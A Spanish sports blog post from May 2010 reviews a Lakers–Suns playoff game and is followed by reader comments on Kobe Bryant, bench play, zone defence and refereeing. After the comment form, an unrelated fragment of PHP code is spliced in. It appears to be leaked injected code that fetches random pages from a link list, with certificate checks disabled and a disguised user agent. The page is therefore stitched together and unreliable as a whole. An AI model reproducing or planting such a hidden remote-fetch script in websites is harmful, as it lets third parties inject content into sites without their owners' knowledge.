Playoffs 25/05/2010: Saliendo del fondo del armario

26 de May de 2010 por TheDeerHunter

Factor segunda unidad. Era algo esperado a favor de Phoenix desde el inicio de la serie… o más bien deberíamos decir desde el inicio de playoffs. No había sido así, sin embargo, hasta ahora en esta final de conferencia contra Lakers. Anoche, en cambio,  fue demoledor: Frye 14, Barbosa 14, Dudley 11, Dragic 8 y Admundson 7. Un total de 54 puntos nada menos, incluídos  un 9 de 20 en triples con 23 rebotes y gran parte de la culpa en el parcial de 40 puntos que los Suns endosaron a los Lakers en el 2º cuarto y el 18-3 en el cuarto decisivo donde se terminó de finiquitar el partido. Cuando Nash volvió atípicamente a cancha a falta de 3 minutos para el final, el choque estaba resuelto gracias a los suplentes.

Por parte de los Lakers el enfoque fue al revés, en un partido flojo de Gasol a Kobe no le quedó más remedio que cargarse con el equipo a la espalda como lo solía hacer antes de la llegada del español. Un partido majestuoso, sublime. Casi 40 puntos con altísimos porcentajes de tiro, tratando de conectar a los suyos con un capazo de asistencias y matándose a defender a su par. De haberlo logrado estaríamos hablando de noche mítica. Pero con sólo 20 puntos de la segunda unidad, 15 de ellos de Odom, con un terrible 2 de 13 de Farmar, Shannon y Walton en una actuación vergonzosa, junto al clásico déficit de 20 tiros libres que invariablemente están sufriendo los Lakers fuera de casa, evitaron la machada.

Gentry le está demostrando a Phil Jackson que es hueso duro de roer. La zona está dando sus frutos y su abuso de lanzadores abiertos ha encontrado el punto a la defensa angelina. Todo vuelve a empezar mañana.

PREMIOS

MVP: Para alzarse con este galardón considerábamos condición sine qua non conseguir la victoria pero anoche Kobe Bryant nos hizo dudar. 38 puntos (15-22), 10 asistencias y 7 rebotes. Es tanta la diferencia con el mejor de los Suns que no darle el premio sería injusto.

Sorpresa: Por un lado el buen hacer de los suplentes de los Suns y por el otro la buena actuación de Andrew Bynum (12-8) cuando todo parecía indicar que le darían descanso en este cuarto partido.

Decepción: Ya lo hemos comentado en la crónica. Patética actuación del banquillo angelino, Lamar Odom aparte.

Esfuerzo en vano: Evidentemente el de Kobe, pero también el de Lamar Odom (15-10) que le dio por aparecer el día que desapareció, en parte, Pau Gasol. No se pondrán de acuerdo.

Y MAÑANA…

No hay descanso. Segundo Match Ball para los Celtics, esta vez en Orlando. Cuidado porque la serie se puede poner de los más interesante si a los Magic les da por ganar y además por dejar una buena imagen. El chute de confianza puede ser decisivo.

Comenta

17 comentarios a esta entrada

  1. Love Denise dice:
    #1

    uf, al abrir la cronica y leer el titular que ha puesto deer, pensaba que había pasado algo en las duchas con la pastilla de jabón.
    Espectacular Kobe, cargando con todo el muerto a sus espaldas, a pesar del mal partido de algunos compañeros, les ha mantenido con algunas opciones. Si los Lakers tuvieran un banquillo medio decente, serían absolutamente invencibles.
    Por los Suns, por fin despertó Frye tras hibernar en los 3 primeros partidos, y me gusta también la aportación de Dudley, buen jugador de equipo

      Citar

  2. MagicJohnson32 dice:
    #2

    Buff, es difícil pensar que se puede jugar mejor de lo que hizo Kobe anoche. Lo que no alcanzo a entender es por qué en el último cuarto los compañeros dejaron de seguir la táctica: “darle la bola y apartarse de su camino”, teniendo en cuenta que fue lo único que funcionó. Vale que no es el ideal de juego pero teniendo en cuenta la efectividad con la que anotó…

    Y la cuestión no es sólo por lo que anota. Es que parece el único que entiende cómo atacar una zona. Al margen de su racha de triples es el único que busca al pívot en el poste medio, que divide y abre… en fin, cosas básicas. No cuesta horrores hacerle llegar bolas a Pau, aunque echo de menos algo más de agresividad por su parte a la hora de pedirla.

    Y, al margen de todo esto, los Lakers tienen un problema con el banquillo. Farmar y Brown han tenido sus momentos durante los Playoffs, pero básicamente con algunos días de acierto en el tiro. Flojean en defensa y cuando no anotan, no aportan nada en ataque.

    Una cosa: ¿os parece normal la diferencia tan brutal en el número de tiros libres en los dos partidos jugados en Phoenix? 33 han tirado los Lakers por 72 que han tirado los Suns.

      Citar

  3. TheDeerHunter dice:
    #3

    Lo de los tiros libres es un detalle que mencioné en ambas crónicas. También sucedió contra los Thunder y, en menor medida contra Utah. El asunto, como se vió en el primero en Phoenix, no sólo es el problema de una ventaja de 15-18 puntos a favor de los Suns, sino los problemas de faltas de los jugadores, que no están defendiendo tan agresivos como para sufrir lo que están sufriendo.
    Creo sinceramente que los Suns han jugado muy bien y han merecido ganar, pero que en condiciones normales y de igualdad hubieran perdido como mínimo uno de los dos partidos.

    Por fin han llegado los playoffs.

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    ¿influirá lo de la zona en los tiros libres?

      Citar

  5. TheDeerHunter dice:
    #5

    ¿defendiendo en zona se hacen menos faltas?
    no tiene porqué…

      Citar

  6. aro_pasado_no_newtoniano dice:
    #6

    Hasta donde no llegan mis conocimientos, diría que sí. Se reducen los 1 contra 1 interiores y tal. igual estoy equivocado qué hará una década que no juego.
    Confabular también tiene su gracia. Lo entiendo.

      Citar

  7. Love Denise dice:
    #7

    siempre habrá excepciones, pero por regla general, en zona se cometen menos faltas, además de desgastar menos fisicamente al defensor porque requiere menos movimientos, es decir, no tiene que ir pasando bloqueos o detrás del rival como un perro presa, como bien dice aro pasado, los 1×1 se reducen en favor de los tiros de media distancia

      Citar

  8. TheDeerHunter dice:
    #8

    ¿Desde cuando la defensa individual es sinónimo de falta?
    La defensa en zona no puede justificar una diferencia del doble de faltas en dos partidos seguidos. Y más al nivel de agresividad que defienden los Lakers. No estamos hablando de 4 o 5 faltas de diferencia.

    Nunca me ha gustado el tema… pero yo arbitrajes así los quiero en L.A. Pero seguramente pasará como contra los Thunder, cuando fuera de casa esto no se da (con zona o con lo que os de la gana) se notará y mucho. Se admiten apuestas.

    Confabular puede tener su gracia… pero teorizar de lejos vía tópicos típicos tiene todavía más, a_p_n_n….

      Citar

  9. Love Denise dice:
    #9

    deer hunter, nadie ha dicho que la defensa individual sea sinónimo de falta, pero por regla general una defensa en zona tiende a cometer menos faltas, no sé si tantas menos como las de Phoenix respecto a L.A., pero menos, porque hace que los interiores tengan dificultades para jugarse 1×1 por las ayudas defensivas y tengan que sacar el balon para que los exteriores tiren triples o tiros de media distancia, que obviamente generan menos faltas que una penetración o un 1×1 en la zona.
    Si los lakers meten sus tiros exteriores, tranquilo, ya se encargará Gentry de quitar la zona

      Citar

  10. TheDeerHunter dice:
    #10

    No quiero que gire este debate en torno a las faltas… simplemente es un hecho y ha sido un factor, pero no el único ni mucho menos el decisivo. Simplemente yo me he limitado a reflejar el dato, que casualmente coincide con el tema Thunder, donde no había tanta zona por en medio. En ambos casos está perjudicando seriamente al equipo amarillo y esto también es un hecho.

    Para hacer una valoración de lo que planteáis, necesitaría más datos. Yo creo que esa teoría/interpretación que defendeis puede tener parte de cierto, pero no es concluyente en absoluto. Creo que no habría nada más que sacar el dato de cuantas faltas de media le pitan a los Lakers en otras circunstancias… porque al final lo que a mí me parece exagerado no tiene que ver con ninguna zona. La impresión que me da es que, como en los últimos años, el típico caserismo de playoffs sólo va en una dirección y no es la de los amarillos por estilo de juego (y esto es completamente subjetivo, lo admito)

    De la zona de Gentry, en los USA la califican de “infantiloide”. No me preocupa en absoluto… mientras Phil Jackson no la siga subestimando. Por mi parte aplaudo a Gentry, que no deja de sorprenderme día a día.

      Citar

  11. aro_pasado_no_newtoniano dice:
    #11

    Ya, has comentado el dato, pero también has dicho que en “condiciones normales y de igualdad los suns hubieran pérdido un partido”, que ya es inferir un poco.

    Yo sólo quería decir, que la zona puede ser un factor en la diferencia de faltas, ya una de las cosas que se dicen como de ventaja de la zona (de la 2-3 más aún) es la cometer menos faltas.

    Cambio lo de confabular, por lo de ver confabulaciones. Total pa’ qué?? para ganar los lakers la serie en 6, que es lo que tiene pinta,, y ojalá me equivoque.

      Citar

  12. pcerezo dice:
    #12

    Villarato…jajaja Es broma.
    Creo que los Lakers son inconstantes de cojones. Un equipo tan irregular tiene estas cosas. Odom es incapaz de jugar tres partidos buenos seguidos en toda su carrera, Artest nunca ha sido fiable en ataque, lo del banquillo es tremendo, y claro, en el momento en el que uno de los dos mejores falla todo se hace má scuesta arriba. Estoy seguro que en el Staples van a ser más duros, más físicos y van a ganar claro.

    P.D.: quiero aclarar el comentario que hice ayer acerca de José Tomás. Mi intención simplemente fue hacer una comparación sin meterme en lo que significa o puede significar la fiesta de los toros. Me imagino que cada uno tendrá su opinión al respecto y yo evidentemente respeto todas y no entro a valorarlas. Lo que no voy es a entrar en discusiones acaloradas ni ofensivas ya que si precisamente leo y opino en este blog es por el respeto que todos tenemos a los comentarios de los demás y que todas las opiniones y discusiones se desarrollan dentro de unos límites normales, además de que los artículos están muy bien escritos y documentados.

    Un saludo,
    Pablo

      Citar

  13. MagicJohnson32 dice:
    #13

    Claro, la zona es un factor, pero 40 tiros libres de diferencia no salen de una zona. Además, la zona es un factor cuando eso provoca que el rival tire muchos más triples que tú, cosa que no sucede porque los Suns anoche incluso lanzaron más que los Lakers.

    Otra cosa es que Lakers ha de mejorar en defensa…

      Citar

  14. sergio dice:
    #14

    Ayer los Lakers no jugaron agresivos en ningún momento. Especialmente en defensa. Muuuchos tiros exteriores practicamente sólos. No se puede permitir que cualquiera que saliese ayer en el partido pensara que era el partido de su vida.
    En cuanto a lo de las faltas… pues mira, no creo que hubiese muchas faltas sin pitar a favor de Lakers. Quizás si alguna excesiva a favor de los Suns. El problema de faltas es algo muy grave para Lakers por la falta de banquillo que tienen. En cuanto un jugador alto o Bryant se cargan de faltas… se pone todo muy cuesta arriba.
    No entiendo como una zona puede crearle tantos problemas a los Lakers cuando tienen al mejor pívot pasador de la Liga. Eso es de manual básico de entrenador: pívot en el tiro libre y a repartir juego. Se crean espacios en el poste bajo, facilita el bloqueo y continuación,…. Cada vez existen más conceptos tácticos “europeos” en la NBA. Su conocimiento se está convirtiendo en una necesidad para los entrenadores. Phil no ha sabido solución a dichos problemas, lo que habla algo mal de él dentro de la inmensa calidad como entrenador que tiene.
    Y aparte de todo lo dicho, los Lakers, sin jugar bien como equipo en ninguno de los dos últimos partidos, han estado cerca de ganar ambos. Cuando se cabreen un poquito y empiecen a ser intensos en defensa… le ganaran a cualquiera. Me preocupo un poco ver a Gasol un poco pasota, sin intensidad, desconcentrado,… No merece crítica con los PO que está realizando hasta el momento, pero no puede esconderse si quiere seguir teniendo el respeto de la Liga. Es hora de tomar responsabilidades por el bien de tu equipo… aunque fracases Pau!

      Citar

  15. Viva_Dirk dice:
    #15

    El partido de ayer no lo vi, pero en el tercer partido las faltas fueron un factor totalmente determinante. Espero volver a la normalidad en ese sentido en el Staples.

      Citar

  16. mmmm dice:
    #16

    No vi el partido, pero los arbitrajes caseros (sobre todo en faltas) ya se ven con normalidad en playoff, y es normal que favorezcan al menos favorito en pro del espectáculo. Porque si encima de ser favoritos los favoreces con los árbitros apaga y vamonos. También hay canchas más propensas a ello, como el Garden o The Q, o sin ir más lejos el de los Jazz.

      Citar

  17. TheDeerHunter dice:
    #17

    por cierto, que con la derrota y tal no comentamos que Kobe ha pasado a Malone como 4º máximo anotador de la historia de los playoffs.

    le preceden Shaq, Kareem y Jordan. Ahí es nada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>